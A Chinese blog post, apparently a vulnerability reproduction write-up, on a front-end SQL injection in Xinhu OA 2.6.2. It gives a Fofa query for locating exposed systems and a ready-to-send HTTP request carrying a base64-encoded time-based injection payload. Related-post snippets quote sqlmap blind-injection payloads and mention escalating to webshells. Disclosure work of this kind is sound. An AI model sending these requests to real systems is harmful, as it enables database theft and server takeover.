信呼OA index.php SQL注入

于 2024-09-01 10:02:53 发布
阅读量118 收藏
点赞数 6
分类专栏: 漏洞复现 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/xc_214/article/details/141779815
版权

0x01 漏洞描述:

在信呼OA系统2.6.2版本的/webmain/task/openapi/openmodhetongAction.php文件中,存在一个前台SQL注入漏洞。当$nickName变量经过base64解码后被加入到uarr数组中,并最终传递给$db->record()方法进行SQL查询时,攻击者可以利用此漏洞进行SQL注入攻击。

0x02 影响版本:

信呼OA系统 2.6.2

0x03 搜索语句:

Fofa:app="信呼-OA系统"

0x04 漏洞复现:

在index.php接口中参数nickName可通过base64编码形式绕过检测导致sql注入

GET /index.php?m=openmodhetong|openapi&d=task&a=data&ajaxbool=0&nickName=MScgYW5kIHNsZWVwKDUpIw== HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/png,image/svg+xml,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Connection: close

0x05 修复建议: 

关闭互联网暴露面或接口设置访问权限

iSee857
关注
  • 6
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
信呼OA nickName SQL注入漏洞复现(XVE-2024-19304)
0xSec
08-03 453
信呼OAnickName 存在SQL注入漏洞,未经身份验证的远程攻击者除了可以利用SQL注入漏洞获取数据库中的信息(例如,管理员后台密码、站点的用户个人信息)之外,甚至在高权限的情况可向服务器中写入木马,进一步获取服务器系统权限。
泛微E-Office SQL注入漏洞复现
0xSec
11-28 1721
泛微E-Office是一款标准化的协同 OA 办公软件,泛微协同办公产品系列成员之一,实行通用化产品设计,充分贴合企业管理需求,本着简洁易用、高效智能的原则,为企业快速打造移动化、无纸化、数字化的办公平台。
通达OA 11.5 SQL注入漏洞复现
zzf011900的博客
11-10 488
sqlmap 的payload:布尔盲注:link_type=false&slot={}&id=(SELECT (CASE WHEN (2489=2489) THEN 2 ELSE (SELECT 2530 UNION SELECT 6370) END))link_type=false&slot={}&id=2,用burp抓包。
通达OA v11.7后台SQL注入
qq_44657899的博客
07-08 1613
文章目录漏洞描述漏洞影响漏洞复现 漏洞描述 通达OA v11.7后台存在SQL注入,可通过此漏洞写入恶意后门文件攻击目标服务器。 漏洞影响 通达OA <= v11.7 漏洞复现 下载通达oa 11.7,https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe 漏洞位置:/general/hr/manage/query/delete_cascade.php ...
E-office OA SQL注入漏洞复现
afei001
01-08 1013
目录 1.漏洞概述 2.影响范围 3.漏洞等级 4.漏洞复现 5.漏洞分析 6.漏洞修复 1.漏洞概述 泛微e-office是泛微公司面向中小型组织推出的OA产品,简单易用高效,部署快、投资少。提供免费试用体验。但泛微e-office OA系统存在的漏洞还真不少。这个SQL注入漏洞之前早就在乌云上爆出过了。 泛微E-office官网:www.weaver.com.cn 2.影响范围 受影响版...
sql注入合集
Aiwin的博客
05-08 976
sql注入合集,持续收集。
通达OA后台SQL注入到RCE
box
09-18 2018
0x00 前戏 一趟护网下来大佬们收割了一大波0day,奈何自己没有没有技术,只能打打靶机。 可能是自己比较菜原因,复现过程中遇到不少坑。 0x01 测试环境 测试版本:11.5.200417 版本 限制条件:需要账号登录 大佬们说是 通达OA v11.7版本,但是试了试 11.5.200417 版本也是同样存在 SQL注入的,更惊喜的是,刚好可以使用11.5版本的前台任意用户登录漏洞,绕过登录需要登录这一条件。 漏洞原理代码分析可以参考云川安全团队的师傅的文章 0x02 漏洞复现 漏洞url:http:
通达OA get_datas.php前台sql注入-可获取数据库session登入后台漏洞复现 [附POC]
薛定谔嘚喵博客
11-08 671
攻击者通过对某OA系统进行代码审计,找到get_datas.php文件中执行sql语句的变量处于可控状态。并可以通过此漏洞获取在线用户的Session值。通过构造绕过特殊的sql注入语句,对在线用户Session记录进行任意查询。利用该漏洞可以实现任意用户登录。配合任意文件上传漏洞,上传webshell。
通达OA 11.7 后台sql注入getshell漏洞复现
Adminxe的博客
09-23 1641
0x00 漏洞描述 通达OA 11.7存在sql注入 0x01 漏洞影响版本 通达oa 11.7 利用条件:需要账号登录 0x02 漏洞复现 1、下载通达OA 11.7,https://cdndown.tongda2000.com/oa/2019/TDOA11.7.exe,点击安装 2、condition_cascade参数存在布尔盲注 POC: GET /general/hr/manage/query/delete_cascade.php?condition_cascade=se...
信呼协同办公OA系统 v1.7.8
10-11
"信呼协同办公OA系统 v1.7.8" 是一款专为企业打造的开源协同办公解决方案,具备跨平台特性,可适用于多种设备和操作系统,包括手机APP、PC网页版以及PC客户端。这款系统的主要目标是让每个企业都能拥有个性化的、...
证券行业加密业务安全风险监测与防御技术研究
qq_61863348的博客
08-27 1174
摘要:解决证券⾏业加密流量威胁问题、加密流量中的应⽤⻛险问题,对若⼲证券⾏业的实际流量内容进⾏调研分析, 分析了证券⾏业加密流量⾯临的合规性⻛险和加密协议及证书本⾝存在的⻛险、以及可能存在的外部加密流量威 胁,并提出防御策略和措施。关键字:证券加密业务、加密应用、加密流量、商用密码安全评估、加密风险、加密威胁、监测防御数据爆发式增长的DT(Data technology)时代,加密技术是数据传输的重要保护手段。随着互联网和企业内部流量场景的加密化趋势快速增长,证券行业也面临着更加迫切的加密需求。证券行业涉及
安全入门day.03
最新发布
mxxcxy的博客
08-31 658
Fiddler是一款强大的HTTP调试代理工具,它以代理服务器的形式工作,通过监听和记录HTTP(s)通讯,帮助用户检查、设置断点以及修改所有进出数据(如cookie、HTML、JS、CSS等文件)。Fiddler不仅简单易用,还提供了用户友好的界面和丰富的功能,如支持断点调试、请求构造、性能数据分析等,使得开发人员和测试人员能够轻松地进行Web调试和性能测试。此外,Fiddler还包含一个基于JScript .NET的事件脚本子系统,支持使用.NET框架语言进行扩展,进一步增强了其灵活性和功能性。
网络安全售前入门08安全服务——Web漏洞扫描服务
打工人
08-31 341
Web漏洞扫描服务主要针对应用系统漏洞进行扫描,主要包括扫描WEB服务器(IIS、Websphere、Weblogic、Apache等)的漏洞;识别数据库类型;扫描第三方组件的漏洞;检测常见的WEB应用弱点,支持OWASP TOP 10等主流安全漏洞。
HarmonyOS(52) 使用安全控件SaveButton保存图片
菜鸟博客
08-30 449
SaveButton 安全控件说明
【架构设计】安全架构设计
师兄怎么办
08-27 1183
在当今以计算机、网络和软件为载体的数字化服务几乎成为人类社会赖以生存的手段,与之而来的计算机犯罪呈现指数上升趋势,因此,信息的可用性、完整性、机密性、可控性和不可抵赖性等安全保障有位重要,为满足这些诉求,离不开好的安全架构设计。GB/T 9387.21995 给出了基于OSI参考模型的7层协议之上的信息安全体系结构。
加密与安全_前后端通过AES-CBC模式安全传输数据
小工匠
08-30 1545
当我们在前端和后端之间传输敏感信息时,安全性变得越来越重要。今天,我们将一起探索如何在前端加密密码,并在后端安全解密的过程。使用Vue.js作为前端框架,并通过Java来处理后端解密。通过动态生成密钥和初始向量,并使用安全的密钥管理服务,我们可以大幅提升系统的安全性。这不仅能防止密钥泄露带来的风险,还能通过安全的密钥交换和管理,确保前后端通信的绝对安全。在实际的生产环境中,密钥的管理和轮换至关重要,建议使用专业的KMS来简化并加强密钥管理工作。通过这些措施,可以构建一个更加安全和稳健的系统。
等保2.0通用部分 | 安全物理环境(三级)测评指导书
2401_84434570的博客
08-30 505
应核查机房是否不位于所在建筑的顶层或地下室,如果否,则核查机房是否采取了防水和防潮措施。a)机房应设置火灾自动消防系统,能够自动检测火情、自动报警,并自动灭火;应设置温湿度自动调节设施,使机房温湿度的变化在设备运行所允许的范围之内。2、应核查机房内设备或主要部件上是否设置了明显且不易除去的标识。2、应核查机房内是否采取了排泄地下积水,防止地下积水渗透的措施。a)应将设备或主要部件进行加固,并设置明显的不易除去的标识;c)应设置机房防盗报警系统或设置有专人值守的视频监控系统。
医院建筑的电气设计——保障医疗质量与安全的坚固基石
acrel002的博客
08-28 462
特别是那些与患者生命息息相关的1、2类场所,如急诊抢救室、手术室、重症监护室等,其供电系统更是被赋予了“特别重要负荷”的标签,要求在极短的时间内恢复供电,以确保医疗活动的连续性和患者的安全。随着一批批新建医院及既有医院的华丽蜕变,从社区医院到综合医院,再到医疗城、医疗集聚区的崛起,不仅彰显了政府对民生健康的深切关怀,也预示着我国医疗体系正迈向智能化、高效化的新时代。医院,作为生命与健康的守护者,其内部布满了各式各样的精密医疗设备与电子仪器,这些设备的稳定运行高度依赖于稳定、可靠的电力供应。
泛微oa e-cology v9 browser.jsp sql注入漏洞
09-15
泛微OA E-Cology V9是一款常用的企业办公自动化系统,该系统的browser.jsp页面存在SQL注入漏洞。SQL注入是一种常见的网络攻击技术,攻击者可以通过构造恶意的SQL语句来绕过系统的认证和授权机制,进而获取敏感数据或者对系统进行非法操作。 泛微OA E-Cology V9中的browser.jsp页面是用于显示OA系统中的个人文件夹和公共文件夹。攻击者可以在该页面中输入恶意的SQL语句,通过执行这些恶意SQL语句,攻击者可以获取到不应该被访问的数据,比如其他用户的文件,甚至可以对数据库进行修改和损坏。 为了防止SQL注入漏洞的利用,可以采取以下措施: 1. 输入过滤和验证:在服务器端对用户输入的数据进行过滤和验证,去除或转义可能包含恶意SQL代码的字符,确保只接受合法的输入。 2. 使用参数化查询:尽量使用参数化查询代替拼接SQL语句的方式,参数化查询可以预编译SQL语句,避免在拼接时引入恶意代码。 3. 限制数据库用户的权限:对数据库用户进行权限控制,确保每个用户只拥有最小必要的权限,减少攻击者利用SQL注入漏洞进行非法操作的机会。 4. 及时更新和修补漏洞:及时跟进厂商的安全通告并安装最新的补丁程序,确保系统始终处于最新的安全状态。 综上所述,泛微OA E-Cology V9中的browser.jsp页面存在SQL注入漏洞,但通过合理的安全措施和注意事项,我们可以有效地减少该漏洞被利用的风险。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值